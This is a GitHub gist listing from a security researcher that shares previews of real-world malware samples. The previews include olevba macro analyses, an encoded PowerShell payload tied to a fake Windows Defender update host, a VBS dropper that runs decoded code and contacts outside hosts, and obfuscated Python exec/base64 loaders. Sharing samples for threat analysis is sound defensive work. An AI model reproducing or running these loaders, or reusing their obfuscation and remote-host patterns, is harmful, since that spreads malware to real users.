Skip to content

Instantly share code, notes, and snippets.

View JohnLaTwC's full-sized avatar

John Lambert JohnLaTwC

631 followers · 1 following
  • Microsoft Corporation
View GitHub Profile
@JohnLaTwC
JohnLaTwC / VBA threat (PK)
Created September 24, 2018 00:02
VBA threat
## Uploaded by @JohnLaTwC
##############################################################################
## 5c50ffa5477cd57cef30457a8bd9064b24766ba57efd46a3d7b5917314b0fea2
olevba3 0.53.1 - http://decalage.info/python/oletools
Flags Filename
----------- -----------------------------------------------------------------
OLE:MAS-H--- 5c50ffa5477cd57cef30457a8bd9064b24766ba57efd46a3d7b5917314b0fea2
===============================================================================
@JohnLaTwC
JohnLaTwC / update.windowsdefenderhost.com
Created September 26, 2018 23:29
update.windowsdefenderhost.com related threats
## Uploaded by @JohnLaTwc
## 5c8fc3b6118f88463f19d21c7f9526d45b40b26b83c74d4e148a6510aeb440de
JABwAGkAbgAgAD0AIABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAcwB5AHMAdABlAG0ALgBuAGUAdAAuAG4AZQB0AHcAbwByAGsAaQBuAGYAbwByAG0AYQB0AGkAbwBuAC4AcABpAG4AZwANAAoAJABzAGUAPQBAACgAKAAnAHUAcABkAGEAdABlAC4AdwBpAG4AZABvAHcAcwBkAGUAZgBlAG4AZABlAHIAaABvAHMAdAAuAGMAbwBtACcAKQAsACgAJwAxADEAMQAuADkAMAAuADEANQA5AC4AMQA0ADkAJwApACkADQAKACQAYQB2AGcAcwAgAD0AIABAACgAKQANAAoAJABuAGkAYwAgAD0AIAAnAHUAcABkAGEAdABlAC4AdwBpAG4AZABvAHcAcwBkAGUAZgBlAG4AZABlAHIAaABvAHMAdAAuAGMAbwBtACcADQAKAGYAbwByACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAMwA7ACQAaQArACsAKQB7AA0ACgAJACQAcwB1AG0AIAA9ACAAMAANAAoACQAkAGMAbwB1AG4AdAAgAD0AIAAwAA0ACgAJAGYAbwByACgAJABqAD0AMQA7ACQAagAgAC0AbABlACAANAA7ACQAagArACsAKQB7AA0ACgAJAAkAJAB0AG0AcAAgAD0AIAAoACQAcABpAG4ALgBzAGUAbgBkACgAJABzAGUAWwAkAGkAXQApACkALgBSAG8AdQBuAGQAdAByAGkAcABUAGkAbQBlAA0ACgAJAAkAaQBmACAAKAAkAHQAbQBwACAALQBuAGUAIAAwACkAewANAAoACQAJAAkACQAkAGMAbwB1AG4AdAAgACsAPQAgADEADQAKAAkACQB9AA0ACgAJAAkAJABzAHUAbQAgACsAPQAgACQAdABtAHAADQ
@JohnLaTwC
JohnLaTwC / e92833f056a197851a5476240a4f3ca94aa8f180e057bb022842dbdd3dbdaf1a
Created September 29, 2018 01:11
VBA MacOffice threat
## Uploaded by @JohnLaTwC
## e92833f056a197851a5476240a4f3ca94aa8f180e057bb022842dbdd3dbdaf1a
olevba3 0.53.1 - http://decalage.info/python/oletools
Flags Filename
----------- -----------------------------------------------------------------
OpX:MASI-B-- e92833f056a197851a5476240a4f3ca94aa8f180e057bb022842dbdd3dbdaf1a
===============================================================================
Type: OpenXML
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls
@JohnLaTwC
JohnLaTwC / 0b078a49fad7a677e1f0f2be108c0cb301506a99fb04ea4bf94643888b1984c7
Created October 6, 2018 19:46
VBA webdav sample
## Uploaded by @JohnLaTwC
## Sample hash 0b078a49fad7a677e1f0f2be108c0cb301506a99fb04ea4bf94643888b1984c7
olevba3 0.53.1 - http://decalage.info/python/oletools
Flags Filename
----------- -----------------------------------------------------------------
OpX:MAS-HB-- 0b078a49fad7a677e1f0f2be108c0cb301506a99fb04ea4bf94643888b1984c7
===============================================================================
FILE: 0b078a49fad7a677e1f0f2be108c0cb301506a99fb04ea4bf94643888b1984c7
Type: OpenXML
-------------------------------------------------------------------------------
@JohnLaTwC
JohnLaTwC / ae986d7b6190876e4229bb1f3b8b3a99190eb89c360ce1e15efef3290afd1b7c
Created October 8, 2018 16:12
VBA PS1 Threat
## Uploaded by @JohnLaTwC
## Sample hash: ae986d7b6190876e4229bb1f3b8b3a99190eb89c360ce1e15efef3290afd1b7c
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Function Base64Decode(ByVal base64String)
Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
Dim dataLength, sOut, groupBegin
base64String = Replace(base64String, vbCrLf, "")
base64String = Replace(base64String, vbTab, "")
base64String = Replace(base64String, " ", "")
@JohnLaTwC
JohnLaTwC / 6fc3b713a888c300fcac4d3b6ac4e97da2ae78eb0dc9baa1209054e69a6f656e
Created October 11, 2018 15:44
DOCX -> RAR -> VBS Threat
Function l(a): With CreateObject("Msxml2.DOMDocument").CreateElement("aux"): .DataType = "bin.base64": .Text = a: l = r(.NodeTypedValue): End With: End Function
Function r(b): With CreateObject("ADODB.Stream"): .Type = 1: .Open: .Write b: .Position = 0: .Type = 2: .CharSet = "utf-8": r = .ReadText: .Close: End With: End function
Execute l("Dim urla
urla = "https://www.alwatanvoice.com/arabic/news/2018/10/08/1180543.html"
Host1 = "http://just4shared.com"
Host2 = "http://akamailshare.com"
Folder = "" '"vb/"
xurl = "1180543"
@JohnLaTwC
JohnLaTwC / fd334bb96b496592db6c9771f305a2ddca6610a59c6d45f5bbbb2b38859b4f36
Created October 20, 2018 00:20
VBS
## Uploaded by @JohnLaTwC
## Sample hash: fd334bb96b496592db6c9771f305a2ddca6610a59c6d45f5bbbb2b38859b4f36
On Error Resume Next
Dim objShell : Set objShell = CreateObject("WScript.Shell")
If LCase(Right(WScript.FullName, 11)) = "wscript.exe" Then
For Each vArg In WScript.Arguments
sArgs = sArgs & " """ & vArg & """"
Next
objShell.Run("cmd.exe /k cscript.exe //nologo " & Chr(34) & WScript.ScriptFullName & Chr(34) & sArgs & " && exit")
@JohnLaTwC
JohnLaTwC / f76319b5bbc1f97b09c05649cf4d6f16944d8e4c3902f46d941e5ae9d914126b
Created November 2, 2018 17:24
Python obfuscation
## Uploaded by @JohnLaTwC
## Sample Hash: f76319b5bbc1f97b09c05649cf4d6f16944d8e4c3902f46d941e5ae9d914126b
exec("import re;import base64");exec((lambda p,y:(lambda o,b,f:re.sub(o,b,f))(r"([0-9a-f]+)",lambda m:p(m,y),base64.b64decode("IyEvZjkvZmUvZDEKCmIgODAsMTMKYiAyNApiIDVkCmIgMWEsIDI1CmIgZgpiIGI4CmIgYWEKYTcgYWQgYiAxMDgsIGM1CmE3IDI1IGIgNDcsIGI0LCA3NApiIDMzCmIgOGUKYiBhNQpiIGFkCgo1MCA9ICI4ODovL2ZhLjU3LmZmIgozNSA9IDUwKyIvMTA5LTkzLzkzLWYxLmZjIgo1ZSA9IDM1ICsgIj83Nj05ZCYxMTU9Ni41LjEiCjQ5ID0gNTArIi80OS8iCgoxZCA9IDZhKDVkLjRmWzFdKQo3MSA9ICJjYy42ZS44MiIKYTQgPSA4MC43OCgnYmE6Ly9iNS85OC8lY2InICUgKDcxKSkKOTAgPSAzMy45MSgpCjVhID0gMzMuOTEoKS4zZQoxMDggPSA5MC4zZSgnMTA4JykKMjMgPSAxMDgrIi9lYy5jZCIKYjYgPSAxMDgrIi9mNC5jZCIKNWMgPSAxMDgrIi9kNS45YiIKYjEgPSAyNC43MCgpCgoKMTQgY2UoMTAzLCA1Nj0nJywgNGM9JycpOgoJNDMgNTY6IDY5ID0gMjUuNDcoMTAzLCA1NikKCThhOiA2OSA9IDI1LjQ3KDEwMykKCTY5LjUxKCdhMC05NCcsICc3Mi81LjAgKDczOyAxMTE7IDczIDExMiA1LjE7IGEyLTEwYjsgZTg6MS45LjAuMykgOTcvOTYgNmYvMy4wLjMnKQoJNDMgNGM6CgkgIDY5LjUxKCdiNycsIDRjKQoJNDIgPSAyNS43NCg2OSkKCT
@JohnLaTwC
JohnLaTwC / f76319b5bbc1f97b09c05649cf4d6f16944d8e4c3902f46d941e5ae9d914126b
Created November 2, 2018 17:39
Python obfuscated sample
## Uploaded by @JohnLaTwC
## Sample Hash: f76319b5bbc1f97b09c05649cf4d6f16944d8e4c3902f46d941e5ae9d914126b
exec("import re;import base64");exec((lambda p,y:(lambda o,b,f:re.sub(o,b,f))(r"([0-9a-f]+)",lambda m:p(m,y),base64.b64decode("IyEvZjkvZmUvZDEKCmIgODAsMTMKYiAyNApiIDVkCmIgMWEsIDI1CmIgZgpiIGI4CmIgYWEKYTcgYWQgYiAxMDgsIGM1CmE3IDI1IGIgNDcsIGI0LCA3NApiIDMzCmIgOGUKYiBhNQpiIGFkCgo1MCA9ICI4ODovL2ZhLjU3LmZmIgozNSA9IDUwKyIvMTA5LTkzLzkzLWYxLmZjIgo1ZSA9IDM1ICsgIj83Nj05ZCYxMTU9Ni41LjEiCjQ5ID0gNTArIi80OS8iCgoxZCA9IDZhKDVkLjRmWzFdKQo3MSA9ICJjYy42ZS44MiIKYTQgPSA4MC43OCgnYmE6Ly9iNS85OC8lY2InICUgKDcxKSkKOTAgPSAzMy45MSgpCjVhID0gMzMuOTEoKS4zZQoxMDggPSA5MC4zZSgnMTA4JykKMjMgPSAxMDgrIi9lYy5jZCIKYjYgPSAxMDgrIi9mNC5jZCIKNWMgPSAxMDgrIi9kNS45YiIKYjEgPSAyNC43MCgpCgoKMTQgY2UoMTAzLCA1Nj0nJywgNGM9JycpOgoJNDMgNTY6IDY5ID0gMjUuNDcoMTAzLCA1NikKCThhOiA2OSA9IDI1LjQ3KDEwMykKCTY5LjUxKCdhMC05NCcsICc3Mi81LjAgKDczOyAxMTE7IDczIDExMiA1LjE7IGEyLTEwYjsgZTg6MS45LjAuMykgOTcvOTYgNmYvMy4wLjMnKQoJNDMgNGM6CgkgIDY5LjUxKCdiNycsIDRjKQoJNDIgPSAyNS43NCg2OSkKCT
@JohnLaTwC
JohnLaTwC / 285e6f550560f0ce01bcf0a1a47350075cca366f9e4bf9b573fd5b03c5644b29
Created November 7, 2018 16:40
VBA XLS + Invoke-Obfuscation
## Uploaded by @JohnLaTwC
## Sample hash: 285e6f550560f0ce01bcf0a1a47350075cca366f9e4bf9b573fd5b03c5644b29
olevba3 0.53.1 - http://decalage.info/python/oletools
Flags Filename
----------- -----------------------------------------------------------------
OLE:MASIHB-- 285e6f550560f0ce01bcf0a1a47350075cca366f9e4bf9b573fd5b03c5644b29
===============================================================================
FILE: 285e6f550560f0ce01bcf0a1a47350075cca366f9e4bf9b573fd5b03c5644b29
Type: OLE